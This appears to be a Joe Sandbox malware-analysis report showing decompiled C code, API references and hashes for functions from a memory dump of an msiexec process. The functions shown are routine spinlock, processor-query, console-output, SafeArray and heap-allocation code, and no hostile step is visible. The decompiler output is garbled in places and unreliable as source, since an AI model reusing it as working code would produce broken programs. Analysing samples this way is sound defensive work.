					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E049D8778( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}

0x049d8ac3
0x049d8ac5
0x049d8ac7
0x049d8aca
0x049d8aca
0x049d8ad1
0x049d8ad8
0x00000000
0x00000000
0x049d8ae6
0x049d8aed
0x049d8b85
0x049d8b85
0x049d8b85
0x049d8b89
0x00000000
0x00000000
0x049d8b94
0x049d8b9a
0x00000000
0x00000000
0x00000000
0x00000000
0x049d8b9c
0x049d8b9c
0x049d8ba1
0x049d8ba7
0x049d8bae
0x049d8bb8
0x049d8bbd
0x049d8bc4
0x049d8bcb
0x049d8bd9
0x049d8be7
0x049d8bdb
0x049d8be3
0x049d8be3
0x049d8bd9
0x049d8bed
0x049d8c0f
0x049d8c18
0x049d8c1c
0x049d8c20
0x00000000
0x049d8bef
0x049d8bef
0x049d8bf4
0x00000000
0x00000000
0x049d8c00
0x049d8c06
0x00000000
0x00000000
0x049d8c08
0x00000000
0x049d8c08
0x049d8bef
0x049d8c25
0x049d8c25
0x049d8c34
0x049d8c3b
0x049d8c3e
0x049d8c3e
0x00000000
0x049d8c34
0x00000000
0x049d8b85
0x049d8af8
0x049d8afe
0x049d8b04
0x049d8b60
0x049d8b63
0x00000000
0x00000000
0x049d8b6a
0x049d8b72
0x049d8b78
0x049d8b83
0x00000000
0x049d8b83
0x049d8b7a
0x00000000
0x049d8b7a
0x00000000
0x049d8b06
0x049d8b09
0x00000000
0x049d8b18
0x049d8b18
0x049d8b18
0x00000000
0x049d8b21
0x049d8b24
0x00000000
0x00000000
0x049d8b29
0x049d8b52
0x049d8b56
0x049d8b5b
0x049d8b5e
0x00000000
0x00000000
0x00000000
0x049d8b5e
0x049d8b32
0x049d8b38
0x00000000
0x00000000
0x049d8b3f
0x049d8b42
0x049d8b49
0x00000000
0x049d8b49
0x049d8c45
0x049d8c50

APIs

Part of subcall function 049D8F7C: GetCurrentThreadId.KERNEL32 ref: 049D8F7F

GetTickCount.KERNEL32 ref: 049D8AF3
GetTickCount.KERNEL32 ref: 049D8B0B
GetCurrentThreadId.KERNEL32 ref: 049D8B3A
GetTickCount.KERNEL32 ref: 049D8B65
GetTickCount.KERNEL32 ref: 049D8B9C
GetTickCount.KERNEL32 ref: 049D8BC6
GetCurrentThreadId.KERNEL32 ref: 049D8C36

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: CountTick$CurrentThread
String ID:
API String ID: 3968769311-0
Opcode ID: 66417bba26e79151e78ad1e7ec5d5042f4f197c384dd4b35b6561239912a83e5
Instruction ID: 7161fb014eef8b8699021f88c95a2ab902e012306b7499ec5f0eb3bc28a5a247
Opcode Fuzzy Hash: 66417bba26e79151e78ad1e7ec5d5042f4f197c384dd4b35b6561239912a83e5
Instruction Fuzzy Hash: 92415EB12093419EE761FE7CC54432EBADAAF84354F15C93CD4F887282EB78B4898752

Uniqueness

Uniqueness Score: -1.00%

Function 049D8834, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E049D8834(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L049D52B4();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E049D6EB8(_v16);
						_push(_t41);
						_push(E049D88E2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L049D52B4();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E049D88E9);
							return E049D6ED4(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E049D965C();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}

0x049d8835
0x049d8837
0x049d883c
0x049d8856
0x049d88e9
0x049d88e9
0x00000000
0x049d885c
0x049d885c
0x049d885f
0x049d8860
0x049d8862
0x049d8869
0x00000000
0x049d8875
0x049d887d
0x049d8882
0x049d8883
0x049d8888
0x049d888b
0x049d8891
0x049d8895
0x049d8896
0x049d889b
0x049d88a2
0x049d88cc
0x049d88ce
0x049d88d1
0x049d88d4
0x049d88e1
0x049d88a4
0x049d88a4
0x049d88bf
0x049d88c2
0x049d88ca
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x049d88ca
0x049d88b5
0x049d88b8
0x049d88f0
0x049d88f6
0x049d88f6
0x049d88a2
0x049d8869
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 049D8849
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 049D884F
GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 049D886B

Strings

kernel32.dll, xrefs: 049D8844
@, xrefs: 049D88E9
GetLogicalProcessorInformation, xrefs: 049D883F

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: @$GetLogicalProcessorInformation$kernel32.dll
API String ID: 4275029093-79381301
Opcode ID: 12c941fe284ce8d1650d01d9b06280a23ebe358e46be3db21438d29509f4328c
Instruction ID: 6b85588164752abe8a03f834177afe76702051097529e98d57f5b3ff00985bad
Opcode Fuzzy Hash: 12c941fe284ce8d1650d01d9b06280a23ebe358e46be3db21438d29509f4328c
Instruction Fuzzy Hash: E2117C70D00208AEEF11FFA5C845AADB7B8EF84358F10C0B5E834A7642D779BA40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 049D625C, Relevance: 10.6, APIs: 7, Instructions: 51
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E049D625C(CHAR* __eax, void* __ecx, CHAR* __edx) {
				long _v12;
				int _t5;
				long _t8;
				void* _t12;
				long _t13;
				void* _t14;
				long _t19;

				_t25 = __edx;
				_t21 = __eax;
				if( *0x4c9005c == 0) {
					_t5 = MessageBoxA(0, __eax, __edx, 0x2010);
				} else {
					_t8 = E049DA430(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t25, _t8,  &_v12, 0);
					_t12 =  *0x4c80078; // 0x49d53cc
					_t13 = E049DA430(_t12);
					_t14 =  *0x4c80078; // 0x49d53cc
					WriteFile(GetStdHandle(0xfffffff4), _t14, _t13,  &_v12, 0);
					_t19 = E049DA430(_t21);
					_t5 = WriteFile(GetStdHandle(0xfffffff4), _t21, _t19,  &_v12, 0);
				}
				return _t5;
			}

0x049d625f
0x049d6261
0x049d626a
0x049d62d6
0x049d626c
0x049d6275
0x049d6284
0x049d6290
0x049d6295
0x049d629b
0x049d62a9
0x049d62b7
0x049d62c6
0x049d62c6
0x049d62de

APIs

GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 049D627E
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 049D6284
GetStdHandle.KERNEL32(000000F4,049D53CC,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 049D62A3
WriteFile.KERNEL32(00000000,000000F4,049D53CC,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 049D62A9
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,049D53CC,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 049D62C0
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,049D53CC,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 049D62C6
MessageBoxA.USER32(00000000,?,?,00002010), ref: 049D62D6

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID:
API String ID: 1570097196-0
Opcode ID: 276dbda2d3d5a3fcf60a082bc8159ff260ec5785c11d07f8a66c7eae70c01f4e
Instruction ID: 75027977e5d6f58dfdf56cab2fa530e0c407c84992da23b3804b222cc8cfdc41
Opcode Fuzzy Hash: 276dbda2d3d5a3fcf60a082bc8159ff260ec5785c11d07f8a66c7eae70c01f4e
Instruction Fuzzy Hash: 070144A52542207EF110FBF99D88F5B668CCBC563DFA2C6357218D64C0CA54BC4497B5

Uniqueness

Uniqueness Score: -1.00%

Function 04A08074, Relevance: 9.1, APIs: 6, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04A08074(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E04A07718(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L04A058A4();
					return E04A07718(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L04A05E78();
						_t123 = _t64;
						if(_t123 == 0) {
							E04A07470(_t110);
						}
						E04A079B4(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E04A07FEC(_v788 - 1, _t125) != 0) {
								L04A05E90();
								E04A07718(_v792);
								L04A05E90();
								E04A07718( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E04A0801C(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L04A05E80();
							E04A07718(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L04A05E88();
							E04A07718(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}

0x04a08074
0x04a08080
0x04a08086
0x04a0808c
0x04a0809c
0x04a080a3
0x04a080a3
0x04a080ae
0x04a080bc
0x04a08247
0x04a0824e
0x04a0824f
0x00000000
0x04a080c2
0x04a080c5
0x04a080e3
0x04a080c7
0x04a080d2
0x04a080d2
0x04a080f2
0x04a080fe
0x04a08101
0x04a0816e
0x04a08174
0x04a08175
0x04a0817b
0x04a0817c
0x04a0817e
0x04a08183
0x04a08187
0x04a08189
0x04a08189
0x04a08194
0x04a0819f
0x04a081aa
0x04a081b3
0x04a081b6
0x04a081d2
0x04a081d9
0x04a081e4
0x04a081fb
0x04a08200
0x04a08214
0x04a08219
0x04a0822c
0x04a0822c
0x04a08235
0x04a081b8
0x04a081b8
0x04a081b9
0x04a081bf
0x04a081c5
0x04a081c7
0x04a081c9
0x04a081cc
0x04a081cf
0x04a081cf
0x04a081d2
0x00000000
0x00000000
0x00000000
0x04a081d2
0x04a08103
0x04a08103
0x04a08104
0x04a08106
0x04a0810c
0x04a0810e
0x04a0811d
0x04a0811e
0x04a08128
0x04a08129
0x04a0812e
0x04a08139
0x04a0813a
0x04a08144
0x04a08145
0x04a0814a
0x04a08165
0x04a08167
0x04a08168
0x04a0816b
0x04a0816b
0x00000000
0x04a0810c
0x04a08101

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 04A08129
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 04A08145
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 04A0817E
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04A081FB
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04A08214
VariantCopy.OLEAUT32(?,?), ref: 04A0824F

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 6e821741b31b749c3b7603a946a1cc5e2c7fe8c577b257c25614d8aa71690f78
Instruction ID: 05ec43868e442f7a147312f023aa80e60af1f5fe25766049d33a60cbcec6b7ac
Opcode Fuzzy Hash: 6e821741b31b749c3b7603a946a1cc5e2c7fe8c577b257c25614d8aa71690f78
Instruction Fuzzy Hash: B2510675A012299FDB22EB58D980BD9B3FCAF0C304F4081D9E508E7251D634BF848F65

Uniqueness

Uniqueness Score: -1.00%

Function 049D5994, Relevance: 9.0, APIs: 7, Instructions: 298
sleepCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E049D5994(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				intOrPtr* _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				intOrPtr* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				intOrPtr* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x4c9005d; // 0x1
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t121 = VirtualAlloc(0, _t156, 0x101000, 4);
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E049D56F4();
								_t99 =  *0x4c92b84; // 0x4c92b80
								 *_t147 = 0x4c92b80;
								 *0x4c92b84 = _t121;
								 *((intOrPtr*)(_t147 + 4)) = _t99;
								 *_t99 = _t121;
								 *0x4c92b7c = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x4c90aec], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x4c9098d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x4c90aec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x4c90afc + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x4c90af8;
							if((0xfffffffe << _t132 &  *0x4c90af8) == 0) {
								_t133 =  *0x4c90af4; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E049D5678(_t125);
								} else {
									_t110 =  *0x4c90af0; // 0x4f66ac0
									_t109 = _t110 - _t125;
									 *0x4c90af0 = _t109;
									 *0x4c90af4 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x4c90aec = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x4c90b7c + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x4c90afc + _t142 * 4;
								 *_t80 =  *(0x4c90afc + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x4c90af8], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E049D55AC(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x4c90aec = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x4c90994; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x4c80080 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x4c9098d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x4c9005d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x4c90aec], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x4c9098d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x4c90aec], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4c90af8;
							__eflags =  *(__ebx + 1) &  *0x4c90af8;
							if(( *(__ebx + 1) &  *0x4c90af8) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x4c90af4; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E049D5678(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x4c90aec = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x4c90af0; // 0x4f66ac0
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x4c90af4 =  *0x4c90af4 - __edi;
									 *0x4c90af0 = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x4c90afc + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x4c90afc + __eax * 4) + __eax * 8 * 4;
								__edi = 0x4c90b7c + ( *(0x4c90afc + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x4c90afc + __eax * 4;
									 *_t38 =  *(0x4c90afc + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x4c90af8], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E049D55AC(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x4c90aec = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x4f66ae0
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x049d5994
0x049d59a0
0x049d59a6
0x049d5bf4
0x049d5bf9
0x049d5d0c
0x049d5d0d
0x049d5d0f
0x049d5740
0x049d5744
0x049d5746
0x049d5750
0x049d5765
0x049d5769
0x049d576b
0x049d576d
0x049d5773
0x049d5776
0x049d577b
0x049d5780
0x049d5786
0x049d578c
0x049d578f
0x049d5791
0x049d5798
0x049d5798
0x049d57a1
0x049d5d15
0x049d5d15
0x049d5d17
0x049d5d17
0x049d5bff
0x049d5bff
